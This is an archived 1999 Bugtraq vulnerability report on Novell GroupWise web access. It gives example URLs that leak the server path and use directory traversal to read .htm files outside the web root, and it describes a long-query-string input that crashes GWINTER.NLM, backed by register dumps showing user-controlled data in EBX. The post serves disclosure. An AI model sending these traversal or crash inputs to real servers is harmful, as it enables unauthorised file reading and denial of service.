Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com

Neohapsis > Archives > Bugtraq> 1999-q4

Bugtraq Archives: Re: Groupwise Web Interface

Re: Groupwise Web Interface

Subject: Re: Groupwise Web Interface
From: Andrew Frith (afrithIBL.BM)
Date: Wed Dec 22 1999 - 20:23:16 CST

Next message: Richard M. Smith: "Re: Warning to Bugtraq posters."
Previous message: Steven Alexander: "Warning to Bugtraq posters."
Maybe reply: Andrew Frith: "Re: Groupwise Web Interface"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Setup:
NT 4, SP4, IIS 4
Netware 4.11, SP7a, GW 5.5 SP2 - Internet Agent & Web access NLM

1. Web server path
http://server/cgi-bin/GW5/GWWEB.EXE?HELP=bad-request
returns:
Could not find file C:\<web server
root>\cgi-bin\GW5\US\HTML3\HELP\BAD-REQUEST.HTM

2. Read files
Using the format
http://server/cgi-bin/GW5/GWWEB.EXE?HELP=../../../../../index I can read any
files that the web service account has read access to & that end in .htm or
.html on the drive, not just in the web areas.

3. DOS?
Sending http://server/cgi-bin/GW5/GWWEB.EXE? with minimum of 512
characters> will cause an abend in GWINTER.NLM (See Break 1 below). The
server appears to function normally. Trying to shut things down
however...... Upon shutting down the Internet agent we then get another
abend, again in GWINTER.NLM (See Break 2 below). The Internet agent will
shut down. The web access will hang, until the server is downed. The NT
box is unaffected by this.

In the first abend GWINTER blows up. Also on the stack is GWENN2.NLM. Not
much there.

In the second abend GWINTER goes boom again. Also on the stack is
GWCMC.NLM. What is a bit more interesting is that EBX = 61616161, or aaaa,
what I was using on the command line. This string is also in the stack
several times.

I have been able to reproduce the above consistently.

***********

Break 1: Server-4.11a: Page Fault Processor Exception (Error code 00000000)

Registers:
    CS = 0008 DS = 0010 ES = 0010 FS = 0010 GS = 0010 SS = 0010
    EAX = 72006165 EBX = E022BDA8 ECX = 00000004 EDX = 00000001
    ESI = E022BDA4 EDI = E022A01C EBP = 00000002 ESP = 0A082F70
    EIP = F1B6DD5D FLAGS = 00017297
    F1B6DD5D 8A00 MOV AL,[EAX]= ?
    EIP in GWINTER.NLM at code start +00000D5Dh

Running process: gwinter 5 Process
Created by: GWINTER.NLM
Stack pointer: A082D60
Stack limit: A063010
Scheduling priority: 0
Wait state: 00
Stack: --0000000A ?
       --E022C0D3 ?
       --E022BED2 ?
       --00000004 ?
       --0000024C ?
       --E022BECA ?
       --E022BD78 ?
       --E022BD84 ?
       --0A120131 ?
       --000001F4 ?
       --0A082FE8 ?
       --00000000 ?
       --E022A02C ?
       --E022A01C ?
       F1B6D53F (GWINTER.NLM|(Code Start)+53F)
       --E022A01C ?
       --E022A01C ?
       --E0228540 ?
       F1B81EF9 ?
       --E022A01C ?
       F148F0AD (GWENN2.NLM|GW2_NgwThrdCreate+1EE)
       --E0228540 ?
       --00000000 ?
       --E022A01C ?
       --00000000 ?
       --FB0513E0 ?
       --E020E7B0 ?
       --0A0F6A60 ?
       --FB0513E0 ?
       --0A125010 ?
       --0A083008 ?
       F10BC181 (THREADS.NLM|ScheduleWorkToDo+180)

Additional Information:
    The CPU encountered a problem executing code in GWINTER.NLM. The
    problem may be in that module or in data passed to that module
    by another NLM.

**********

Break 2: Server-4.11a: Page Fault Processor Exception (Error code 00000000)

Registers:
    CS = 0008 DS = 0010 ES = 0010 FS = 0010 GS = 0010 SS = 0010
    EAX = 00000000 EBX = 61616161 ECX = 00000000 EDX = E0B9B4E0
    ESI = 00000001 EDI = 00000096 EBP = 0A123C6C ESP = 0A123C68
    EIP = F80BC070 FLAGS = 00017202
    F80BC070 8B73FC MOV ESI,[EBX-04]= ?
    EIP in SERVER.NLM at code start +000BC070h

Running process: gwinter 0 Process
Created by: GWINTER.NLM
Stack pointer: A123C60
Stack limit: A104010
Scheduling priority: 0
Wait state: 00
Stack: --00000000 ?
       --0A123C84 ?
       --00000096 ?
       --00000001 ?
       --61616161 ?
       F10B45ED (THREADS.NLM|free+63)
       --61616161 ?
       --0A123C94 ?
       --E022A01C ?
       F1B38537 (GWCMC.NLM|cmc_free+11)
       --61616161 ?
       --0A123FD8 ?
       F1B82341 ?
       --61616161 ?
       --00000008 ?
       --00000000 ?
       --0A125350 ?
       --0000890B (DS.NLM|DSF9085F20+55D8)
       F1B83C52 ?
       --0BB01F80 (FPSM.NLM|_fltused_+B01A)
       --00007286 (DS.NLM|DSF9085F20+3F53)
       --F915D970 ?
       --F915DAA0 ?
       --00000000 ?
       --0A123CF8 ?
       --0A123CF0 ?
       --0A0F6460 ?
       --00000001 ?
       --00000004 ?
       F80BC193 ?
       --00000004 ?
       --002E12E0 ?

Additional Information:
    The CPU encountered a problem executing code in SERVER.NLM. The
    problem may be in that module or in data passed to that module
    by a process owned by GWINTER.NLM.

Next message: Richard M. Smith: "Re: Warning to Bugtraq posters."
Previous message: Steven Alexander: "Warning to Bugtraq posters."
Maybe reply: Andrew Frith: "Re: Groupwise Web Interface"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b27 : Thu Dec 23 1999 - 15:33:35 CST